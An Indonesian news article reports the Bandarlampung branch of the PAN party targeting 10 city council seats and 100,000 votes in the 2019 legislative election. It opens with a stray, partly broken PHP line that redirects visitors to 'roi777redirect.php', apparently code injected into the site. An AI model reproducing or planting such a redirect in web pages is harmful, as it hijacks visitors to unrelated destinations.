header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); PAN Bandarlampung Targetkan 10 Kursi di Pileg 2019 -
PAN Bandarlampung Targetkan 10 Kursi di Pileg 2019

TRANSLAMPUNG.COM, BANDARLAMPUNG – Dewan Pimpinan Daerah (DPD) Partai Amanat Nasional (PAN) Kota Bandarlampung mentargetkan 10 kursi di DPRD Kota Bandarlampung pada Pemilu Legislatif (Pileg) 2019 mendatang.

Menurut Ketua DPD PAN Kota Bandarlampung Wahyu Lesmono target 10 kursi di legislatif ini PAN Kota Bandarlampung harus pula menargetkan 100 ribu suara pada Pileg di 2019 yang melebihi perolehan pada pemillu sebelumnya.

“Target kita10 kursi di DPRD Kota Bandarlampung harus lebih dari Pileg sebelumnya yang mendapat 64 ribu suara dengan perolehan 7 kursi di DPRD kota Bandarlampung jadi Pileg kedepan harus mencapai harapan kita,” kata Wahyu Lesmono dalam Raker Ke-1 yang di laksanakan di Kantor DPD PAN setempat, Minggu (15/4).

Wahyu Lesmono yang juga sebagi ketua Komisi III DPRD Kota Bandarlampung ini menyatakan tujuan adanya Rakerda ini adalah untuk menyamakan persepsi tentang sikap politik dan strategi PAN se-Indonesia dalam menghadapi Pileg dan Pilpres tahun 2019 mendatang, sekaligus mendengarkan aspirasi dan masukan dari seluruh pengurus.

“Kita sudah rapat khusus terlebih dahulu dengan seluruh pimpinan DPD PAN tingkat DPC se-Kota Bandarlampung, serta pengurus inti DPD PAN pada sebelumnya, dilanjutkan dengan rapat koordinasi dengan seluruh jajaran PAN se-Bandarlampung,” jelasnya.

Anggota DPRD Kota Bandarlampung ini menambahkan, pihaknya juga sudah melakukan kalkulasi kemungkinan perolehan kursi untuk seluruh Dapil Kota Bandarlampung.

“Dengan target 100.000 suara untuk Kota Bandarlampung,” ucapnya.

Sementara itu selaku ketua panitia Raker, yang juga ketua Tim Pemenangan PAN Kota Bandarlampung, Hendarsyah SH, mengatakan Rakerda PAN Kota Bandarlampung, menjelaskan bahwa hari ini adalah semangat Rakerda kita menangkan Pileg dan Pilpres.

“Rapat khusus dihadiri undangan, pengurus, kader. Partai PAN target 100.000 suara, dulu 64. 000 suara. Kita Ikrar suksesi, pemilihan gubernur, presiden, legislatif, kitamulai dari Bandarlampung,” kata Hendarsyah.

Ditambahkan Ketua DPW PAN Lampung, Zainudin Hasan bahwa dirinya mendorong PAN untuk menyatukan barisan, menyamakan visi-misi dengan tujuan yang jelas dan target terukur yaitu menang disetiap agenda kepemiluan. Maka dari itu kader melakukan pergerakan.

“Untuk koalisi urusan DPP, tugas kota didaerah melakukan konsolidasi memperkuat basis masa, 1 orang kader bisa masang benner di 10 rumah sudah luar biasa dan 1 RT 1 relawan,” ucap Zainudin.

Diketahui dalam agenda Rakerda ke-1 di hadir 400 kader inti dan seluruh pengurus PAN mulai tingkat kabupaten, hingga kelurahan di Bandarlampung untuk rapat dihadiri Kedua DPW Lampung DR Zainudin Hasan, sekaligus membuka acara Rakerda tersebut. (ydn/hkw)

News Reporter